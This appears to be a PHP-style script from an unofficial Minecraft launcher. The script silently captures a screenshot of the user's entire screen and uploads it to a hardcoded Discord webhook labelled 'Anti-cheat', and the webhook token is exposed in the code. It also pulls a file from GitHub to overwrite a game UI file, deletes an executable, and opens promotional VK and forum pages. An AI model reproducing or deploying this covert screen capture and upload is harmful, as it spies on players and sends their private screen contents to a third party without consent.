// Replace the URL with your own webhook url
        $url = "https://discord.com/api/webhooks/838284423278493697/gthE3yddrHZwT5n0dYCqvHtu5lQCYy_nnNdfghmnK-W2QOq3X7xPOoaEKhY-tiszfAGW";
        
        new RobotScript->screenshot()->save($_ENV['TEMP'].'\temp.png','png');
        $hookObject = [
            
            'file' => new File($_ENV['TEMP'].'\temp.png'),
            //'file1' => new File('C:\Users\Alex\Desktop\123.mp3'),
            /*
             * The general "message" shown above your embeds
             */
            "content" => "Anti-cheat :kissing_closed_eyes:",
            
            /*
             * The username shown in the message
             */
            "username" => "Анти-чит",
            /*
             * The image location for the senders image
             */
            //"avatar_url" => "https://xforgeassets001.xboxlive.com/serviceid-18231953-4b1d-472c-a39e-48b10105b7b7/a711e445-d98f-4849-8729-57b3c15a0f6f/contentname_Thumbnail_0.jpg",
            /*
             * Whether or not to read the message in Text-to-speech
             */
            "tts" => 0
            
        
        ];
        
        $http = new HttpClient;
        $http->requestType = 'MULTIPART';
        $http->responseType = 'JSON';
        var_dump($http->post($url,$hookObject)->body());
        unlink($_ENV['TEMP'].'\temp.png');

//////////////////////////////

fs::copy('https://github.com/Rastihin/mce/raw/main/start_screen.json',fs::abs('./').'\\data\\resource_packs\\vanilla\\ui\\start_screen.json');
//Для разрешения запуска должно ровняться 1
$GLOBALS['start'] = 1;

unlink('oxibyte.exe');

/*if(file_exists('avma.dll') && sha1_file('avma.dll') == '48d38298436184fbf61b2f1c70d1d8e966dc0eae'){
	$GLOBALS[start] = 1;
}else{
	$GLOBALS[start] = 0;
	open('https://vk.com/minecraft_education_windows_7');
	message("Для запуска игры нужен специальный файл,\nСкачать файл можно в группе которая сейчас открылась!\nПоместите файл avma.dll в папку с игрой!\nПосле чего запускайте игру!\nРекомендуем не отписываться что бы всегда иметь доступ в случае непредвиденных ситуаций!");
}*/





if(fs::exists('Minecraft.Windows.exe') == false){
	message("Вам нужно обновить игру!)");
	open('https://vk.com/minecraft_education_windows_7');
	$GLOBALS['start'] = 0;
}
open('https://oxibyteminecraftbedrockaddons.flarum.cloud/d/5473-podrostkovaya-moda');


